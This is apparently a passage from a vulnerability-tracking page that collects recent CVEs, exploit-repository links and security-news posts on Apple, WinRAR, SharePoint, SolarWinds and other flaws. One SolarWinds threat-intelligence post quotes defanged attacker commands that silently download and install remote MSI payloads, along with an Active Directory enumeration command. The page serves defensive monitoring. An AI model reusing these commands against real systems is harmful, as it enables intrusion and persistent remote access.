- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco

##

AAKL@infosec.exchange at 2026-02-11T17:13:28.000Z ##

Cisco posted two advisories yesterday, if you missed them.

- High: CVE-2026-20119 Cisco TelePresence Collaboration Endpoint Software and RoomOS Software Denial of Service Vulnerability sec.cloudapps.cisco.com/securi

- Medium: CVE-2026-20026 and CVE-2026-20027 Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities sec.cloudapps.cisco.com/securi @cisco #Cisco #infosec #vulnerability

##

exploitdb_bot@mastodon.social at 2026-02-11T10:01:06.000Z ##

🚨 New Exploit: glibc 2.38 - Buffer Overflow
📋 CVE: CVE-2023-4911
👤 Author: Beatriz Fresno Naumova

🔗 exploit-db.com/exploits/52479

#ExploitDB #InfoSec #CyberSecurity #CVE-2023-4911

##

CVE-2025-43529
(8.8 HIGH)

EPSS: 0.03%

updated 2025-12-18T14:59:05.617000

2 posts

A use-after-free issue was addressed with improved memory management. This issue is fixed in watchOS 26.2, Safari 26.2, iOS 18.7.3 and iPadOS 18.7.3, iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2, tvOS 26.2. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited in an extremely sophisticated at

7 repos

https://github.com/bjrjk/CVE-2025-43529

https://github.com/SimoesCTT/CTT-Apple-Silicon-Refraction

https://github.com/sakyu7/sakyu7.github.io

https://github.com/jir4vv1t/CVE-2025-43529

https://github.com/SimoesCTT/Convergent-Time-Theory-Enhanced-iOS-Safari-RCE-CVE-2025-43529-

https://github.com/SgtBattenHA/Analysis

https://github.com/zeroxjf/WebKit-UAF-ANGLE-OOB-Analysis

applsec at 2026-02-11T18:36:22.008Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

##

applsec@infosec.exchange at 2026-02-11T18:36:22.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

#apple #cybersecurity #infosec #security #ios

##

CVE-2025-14174
(8.8 HIGH)

EPSS: 0.65%

updated 2025-12-15T15:16:08.650000

2 posts

Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499.110 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)

6 repos

https://github.com/George0Papasotiriou/CVE-2025-14174-Chrome-Zero-Day

https://github.com/typeconfused/CVE-2025-14174-analysis

https://github.com/sakyu7/sakyu7.github.io

https://github.com/Satirush/CVE-2025-14174-Poc

https://github.com/SgtBattenHA/Analysis

https://github.com/zeroxjf/WebKit-UAF-ANGLE-OOB-Analysis

applsec at 2026-02-11T18:36:22.008Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

##

applsec@infosec.exchange at 2026-02-11T18:36:22.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

#apple #cybersecurity #infosec #security #ios

##

CVE-2024-2511
(5.9 MEDIUM)

EPSS: 3.67%

updated 2025-11-04T00:31:52

1 posts

Issue summary: Some non-default TLS server configurations can cause unbounded memory growth when processing TLSv1.3 sessions Impact summary: An attacker may exploit certain server configurations to trigger unbounded memory growth that would lead to a Denial of Service This problem can occur in TLSv1.3 if the non-default SSL_OP_NO_TICKET option is being used (but not if early_data support is also

certvde at 2026-02-10T07:51:50.697Z ##

VDE-2025-109
Phoenix Contact: Unbounded growth of the session cache in TCP encapsulation service in FL MGUARD 2xxx and 4xxx firmware

The OpenSSL library used in the affected products is vulnerable to an unbounded growth of the session cache in the TLSv1.3 implementation.
CVE-2024-2511

certvde.com/en/advisories/vde-

phoenixcontact.csaf-tp.certvde

##

CVE-2025-60787
(7.2 HIGH)

EPSS: 40.20%

updated 2025-11-03T21:48:21

1 posts

## Summary A command injection vulnerability in MotionEye allows attackers to achieve Remote Code Execution (RCE) by supplying malicious values in configuration fields exposed via the Web UI. Because MotionEye writes user-supplied values directly into Motion configuration files without sanitization, attackers can inject shell syntax that is executed when the Motion process restarts. This issue ena

1 repos

https://github.com/prabhatverma47/CVE-2025-60787

exploitdb_bot@mastodon.social at 2026-02-11T10:16:05.000Z ##

🚨 New Exploit: motionEye 0.43.1b4 - RCE
📋 CVE: CVE-2025-60787
👤 Author: prabhat

🔗 exploit-db.com/exploits/52481

#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60787

##

CVE-2025-8088
(8.8 HIGH)

EPSS: 3.90%

updated 2025-10-22T00:34:26

2 posts

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET.

28 repos

https://github.com/Markusino488/cve-2025-8088

https://github.com/nhattanhh/CVE-2025-8088

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC

https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC

https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder

https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit

https://github.com/walidpyh/CVE-2025-8088

https://github.com/hbesljx/CVE-2025-8088-EXP

https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR

https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool

https://github.com/lucyna77/winrar-exploit

https://github.com/Syrins/CVE-2025-8088-Winrar-Tool-Gui

https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document

https://github.com/techcorp/CVE-2025-8088-Exploit

https://github.com/ghostn4444/CVE-2025-8088

https://github.com/Ismael-20223/CVE-2025-8088

https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

https://github.com/nuky-alt/CVE-2025-8088

https://github.com/jordan922/CVE-2025-8088

https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition

https://github.com/pescada-dev/-CVE-2025-8088

https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

https://github.com/travisbgreen/cve-2025-8088

https://github.com/ilhamrzr/RAR-Anomaly-Inspector

https://github.com/pentestfunctions/best-CVE-2025-8088

daniel1820815 at 2026-02-11T16:24:00.841Z ##

Research observed -Dragon, a Chinese-aligned group linked to , conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced , a Telegram-based remote access tool.

research.checkpoint.com/2026/a

##

daniel1820815@infosec.exchange at 2026-02-11T16:24:00.000Z ##

#CheckPoint Research observed #Amaranth-Dragon, a Chinese-aligned group linked to #APT41, conducting espionage against government and law enforcement across Southeast Asia. The threat actor weaponized #WinRAR flaw CVE-2025-8088 within 10 days after its disclosure, geo-fenced servers to targets, and introduced #TGAmaranth, a Telegram-based remote access tool.

research.checkpoint.com/2026/a

##

CVE-2025-53770
(9.8 CRITICAL)

EPSS: 89.20%

updated 2025-10-22T00:34:26

4 posts

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation

Nuclei template

46 repos

https://github.com/AdityaBhatt3010/CVE-2025-53770-SharePoint-Zero-Day-Variant-Exploited-for-Full-RCE

https://github.com/exfil0/CVE-2025-53770

https://github.com/Bluefire-Redteam-Cybersecurity/bluefire-sharepoint-cve-2025-53770

https://github.com/Rabbitbong/OurSharePoint-CVE-2025-53770

https://github.com/paolokappa/SharePointSecurityMonitor

https://github.com/MuhammadWaseem29/CVE-2025-53770

https://github.com/Michaael01/LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

https://github.com/Agampreet-Singh/CVE-2025-53770

https://github.com/GreenForceNetworks/Toolshell_CVE-2025-53770

https://github.com/harryhaxor/CVE-2025-53770-SharePoint-Deserialization-RCE-PoC

https://github.com/bossnick98/-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

https://github.com/Immersive-Labs-Sec/SharePoint-CVE-2025-53770-POC

https://github.com/n1chr0x/ZeroPoint

https://github.com/saladin0x1/CVE-2025-53770

https://github.com/nisargsuthar/suricata-rule-CVE-2025-53770

https://github.com/ZephrFish/CVE-2025-53770-Scanner

https://github.com/anwakub/CVE-2025-53770

https://github.com/zach115th/ToolShellFinder

https://github.com/3a7/CVE-2025-53770

https://github.com/victormbogu1/LetsDefend-SOC342-CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-andRCE-EventID-320

https://github.com/kaizensecurity/CVE-2025-53770

https://github.com/Cameloo1/sharepoint-toolshell-micro-postmortem

https://github.com/0xray5c68616e37/cve-2025-53770

https://github.com/daryllundy/CVE-2025-53770

https://github.com/RukshanaAlikhan/CVE-2025-53770

https://github.com/tripoloski1337/CVE-2025-53770-scanner

https://github.com/unk9vvn/sharepoint-toolpane

https://github.com/soltanali0/CVE-2025-53770-Exploit

https://github.com/r3xbugbounty/CVE-2025-53770

https://github.com/peiqiF4ck/WebFrameworkTools-5.5-enhance

https://github.com/bitsalv/ToolShell-Honeypot

https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator

https://github.com/go-bi/sharepoint-CVE-2025-53770

https://github.com/behnamvanda/CVE-2025-53770-Checker

https://github.com/Sec-Dan/CVE-2025-53770-Scanner

https://github.com/hazcod/CVE-2025-53770

https://github.com/bharath-cyber-root/sharepoint-toolshell-cve-2025-53770

https://github.com/imbas007/CVE-2025-53770-Vulnerable-Scanner

https://github.com/Udyz/CVE-2025-53770-Exploit

https://github.com/0x-crypt/CVE-2025-53770-Scanner

https://github.com/ghostn4444/CVE-2025-53770

https://github.com/grupooruss/CVE-2025-53770-Checker

https://github.com/yosasasutsut/Blackash-CVE-2025-53770

https://github.com/chrisalee27-dotcom/SOC-Incident-Response-Portfolio

https://github.com/siag-itsec/CVE-2025-53770-Hunting

https://github.com/CyprianAtsyor/ToolShell-CVE-2025-53770-SharePoint-Exploit-Lab-LetsDefend

oversecurity@mastodon.social at 2026-02-10T08:43:36.000Z ##

What Defined Defense in 2025

Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...

🔗️ [Binarydefense] link.is.it/3GT18k

##

oversecurity@mastodon.social at 2026-02-10T08:40:37.000Z ##

What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…

CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…

🔗️ [Binarydefense] link.is.it/EtPFu3

##

oversecurity@mastodon.social at 2026-02-10T08:43:36.000Z ##

What Defined Defense in 2025

Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...

🔗️ [Binarydefense] link.is.it/3GT18k

##

oversecurity@mastodon.social at 2026-02-10T08:40:37.000Z ##

What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomware…

CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly don’t. The Exploit Chain: Familiar Steps, Different Stage At its core,…

🔗️ [Binarydefense] link.is.it/EtPFu3

##

CVE-2018-0802
(7.8 HIGH)

EPSS: 93.89%

updated 2025-10-22T00:31:30

2 posts

Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE is unique from CVE-2018-0797 and CVE-2018-0812.

7 repos

https://github.com/zldww2011/CVE-2018-0802_POC

https://github.com/Abdibimantara/Maldoc-Analysis

https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882

https://github.com/roninAPT/CVE-2018-0802

https://github.com/rxwx/CVE-2018-0802

https://github.com/Palvinder-Singh/PS_CVE2018-0802

https://github.com/Ridter/RTF_11882_0802

technadu at 2026-02-11T10:02:25.700Z ##

Observed campaign summary:

Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)

Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.

This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.

Blue teamers - which telemetry source provides the strongest signal here?

Source: fortinet.com/blog/threat-resea

Follow @technadu for ongoing malware analysis and threat intelligence coverage.

##

technadu@infosec.exchange at 2026-02-11T10:02:25.000Z ##

Observed campaign summary:

Initial Access:
• Phishing emails with Excel (.XLAM) attachments
Execution:
• CVE-2018-0802 (EQNEDT32.EXE)
• HTA → mshta.exe
• PowerShell in-memory decoding
Deployment:
• Fileless .NET loader disguised as Microsoft.Win32.TaskScheduler
• Process hollowing into Msbuild.exe
• AES-encrypted C2 packets
• delimited command protocol
• Plugin-based architecture (50+ modules)

Capabilities include credential theft, ransomware, DDoS, system control, registry persistence, and remote command execution.

This campaign demonstrates mature modular RAT engineering combined with social engineering entry points.

Blue teamers - which telemetry source provides the strongest signal here?

Source: fortinet.com/blog/threat-resea

Follow @technadu for ongoing malware analysis and threat intelligence coverage.

#Infosec #MalwareResearch #ThreatIntel #XWorm #RAT #ProcessInjection #EDR #DFIR #CyberDefense #BlueTeam #TechNadu

##

CVE-2025-26399
(9.8 CRITICAL)

EPSS: 12.86%

updated 2025-09-23T06:30:33

4 posts

SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxProxy deserialization remote code execution vulnerability that, if exploited, would allow an attacker to run commands on the host machine. This vulnerability is a patch bypass of CVE-2024-28988, which in turn is a patch bypass of CVE-2024-28986.

1 repos

https://github.com/rxerium/CVE-2025-26399

hasamba at 2026-02-10T14:26:34.786Z ##

----------------

🎯 Threat Intelligence
===================

Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.

Technical details:
• Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
• Observed staged installers and deployment vectors:
• msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
• msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
• Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
• Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.

Attack chain analysis:
• Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
• Download: MSI payloads hosted on third-party services (Catbox, Supabase).
• Execution: Silent MSI installation via spawned command process from WHD service chain.
• Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
• C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.

Detection considerations:
• Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
• Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
• Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.

Limitations & notes:
• Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
• Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.

🔹 solarwinds -2025-26399 -2025-40551

🔗 Source: huntress.com/blog/active-explo

##

VirusBulletin at 2026-02-10T09:22:28.568Z ##

Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. huntress.com/blog/active-explo

##

cyberhost_blocklist at 2026-02-10T09:07:06.412Z ##

🛡️ CyberHost Malware List Stats 🛡️
3 new domains were added yesterday
Threat Intel Used:
huntress.com/blog/active-explo

Blocklist Details: cyberhost.uk/malware-blocklist

##

VirusBulletin@infosec.exchange at 2026-02-10T09:22:28.000Z ##

Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWinds’ website as soon as possible. huntress.com/blog/active-explo

##

CVE-2025-59375
(7.5 HIGH)

EPSS: 0.12%

updated 2025-09-17T15:31:32

1 posts

libexpat in Expat before 2.7.2 allows attackers to trigger large dynamic memory allocations via a small document that is submitted for parsing.

linux@activitypub.awakari.com at 2026-02-11T09:38:02.000Z ## Ubuntu 25.10 Expat Critical DoS Issues USN-8022-1 CVE-2025-59375 Several security issues were fixed in Expat.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2025-27158
(7.8 HIGH)

EPSS: 0.04%

updated 2025-04-28T16:48:57.070000

1 posts

Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

valkyrie.hacker.gf@bsky.brid.gy at 2026-02-10T07:45:24.926Z ##

you were literally shown an example of a recent Acrobat Reader bug that potentially could lead to RCE - many other examples are available, like www.cvedetails.com/cve/CVE-2025...; if you want more, Google is right where you left it

CVE-2025-27158 : Acrobat Reade...

##

CVE-2025-3573
(6.1 MEDIUM)

EPSS: 0.25%

updated 2025-04-15T14:24:22

2 posts

Versions of the package jquery-validation before 1.20.0 are vulnerable to Cross-site Scripting (XSS) in the showLabel() function, which may take input from a user-controlled placeholder value. This value will populate a message via $.validator.messages in a user localizable dictionary.

krinkle@fosstodon.org at 2026-02-11T03:16:36.000Z ##

@zachleat

Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:

cve.org/CVERecord?id=CVE-2025-

The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐

cve.org/ResourcesSupport/FAQs#

##

krinkle@fosstodon.org at 2026-02-11T03:16:36.000Z ##

@zachleat

Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:

cve.org/CVERecord?id=CVE-2025-

The search relies on descriptions for which standard terms are "an ongoing area of research" 🧐

cve.org/ResourcesSupport/FAQs#

##

CVE-2026-20700
(0 None)

EPSS: 0.00%

2 posts

N/A

applsec at 2026-02-11T18:36:22.008Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

##

applsec@infosec.exchange at 2026-02-11T18:36:22.000Z ##

📣 EMERGENCY UPDATES 📣

Apple pushed updates for 1 new zero-day that may have been actively exploited and is linked to CVE-2025-14174 and CVE-2025-43529 which were fixed in iOS 26.2.

🐛 CVE-2026-20700 (dyld):
- iOS and iPadOS 26.3
- macOS Tahoe 26.3
- tvOS 26.3
- visionOS 26.3
- watchOS 26.3

#apple #cybersecurity #infosec #security #ios

##

CVE-2026-25993
(0 None)

EPSS: 0.03%

1 posts

N/A

offseq at 2026-02-11T04:30:31.046Z ##

🚨 CVE-2026-25993 (CRITICAL): EverShop <2.1.1 allows unauthenticated SQL injection via url_key in category handling. Upgrade to 2.1.1+ or enforce input validation now! radar.offseq.com/threat/cve-20

##

CVE-2026-26009
(0 None)

EPSS: 0.26%

3 posts

N/A

offseq at 2026-02-11T01:30:43.404Z ##

🚨 karutoil catalyst (<11980aaf3f46315b02777f325ba02c56b110165d) faces CRITICAL OS command injection (CVE-2026-26009, CVSS 10.0). Users with template perms can execute root shell commands cluster-wide. Patch immediately! radar.offseq.com/threat/cve-20

##

thehackerwire@mastodon.social at 2026-02-10T21:42:14.000Z ##

🔴 CVE-2026-26009 - Critical (9.9)

Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:14.000Z ##

🔴 CVE-2026-26009 - Critical (9.9)

Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21523
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T23:38:01.000Z ##

🟠 CVE-2026-21523 - High (8)

Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:38:01.000Z ##

🟠 CVE-2026-21523 - High (8)

Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25947
(0 None)

EPSS: 0.03%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T23:15:15.000Z ##

🟠 CVE-2026-25947 - High (8.8)

Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T23:15:15.000Z ##

🟠 CVE-2026-25947 - High (8.8)

Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25506
(0 None)

EPSS: 0.02%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T21:42:24.000Z ##

🟠 CVE-2026-25506 - High (7.7)

MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T21:42:24.000Z ##

🟠 CVE-2026-25506 - High (7.7)

MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24682
(0 None)

EPSS: 0.04%

2 posts

N/A

thehackerwire@mastodon.social at 2026-02-10T15:05:04.000Z ##

🟠 CVE-2026-24682 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-10T15:05:04.000Z ##

🟠 CVE-2026-24682 - High (7.5)

FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, audin_server_recv_formats frees an incorrect number of audio formats on parse failure (i + i), leading to out-of-bounds access in audio_formats_free. This vulnerabil...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25646
(0 None)

EPSS: 0.04%

2 posts

N/A

harrysintonen at 2026-02-10T07:34:51.165Z ##

libpng 1.6.55 has been released with fix to CVE-2026-25646:

"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.

The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.

The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).

Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.

This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."

Announcement: openwall.com/lists/oss-securit
Advisory: github.com/pnggroup/libpng/sec
Fix: github.com/pnggroup/libpng/com

##

harrysintonen@infosec.exchange at 2026-02-10T07:34:51.000Z ##

libpng 1.6.55 has been released with fix to CVE-2026-25646:

"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.

The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.

The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).

Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.

This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."

Announcement: openwall.com/lists/oss-securit
Advisory: github.com/pnggroup/libpng/sec
Fix: github.com/pnggroup/libpng/com

#CVE_2026_25646 #vulnerability #infosec #cybersecurity

##

CVE-2026-23876
(0 None)

EPSS: 0.06%

1 posts

N/A

linux@activitypub.awakari.com at 2026-02-10T14:27:01.000Z ## Ubuntu 24.04 LTS ImageMagick Important Denial Service 8021-1 CVE-2026-23876 ImageMagick could be made to crash or run programs as your login if it opened a specially crafted file.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2026-24476
(0 None)

EPSS: 0.03%

1 posts

N/A

jvalleroy@fosstodon.org at 2026-02-10T03:20:43.000Z ##

I've uploaded new versions of the Shaarli package (bookmarks app) in Debian with a security fix.

The package versions with the fix:
- 0.16.1+dfsg-1 in testing and unstable
- 0.14.0+dfsg-2+deb13u1 in stable-security
- 0.12.1+dfsg-8+deb12u2 in oldstable-security

More information about the issue:
github.com/shaarli/Shaarli/sec
security-tracker.debian.org/tr

#Shaarli #Debian #FreedomBox

##

CVE-2026-25931
(0 None)

EPSS: 0.01%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T23:23:13.000Z ##

🟠 CVE-2026-25931 - High (7.8)

vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-25808
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-02-09T22:26:20.000Z ##

🟠 CVE-2026-25808 - High (7.5)

Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-02-09T22:26:10.000Z ##

🟠 CVE-2026-25807 - High (8.8)

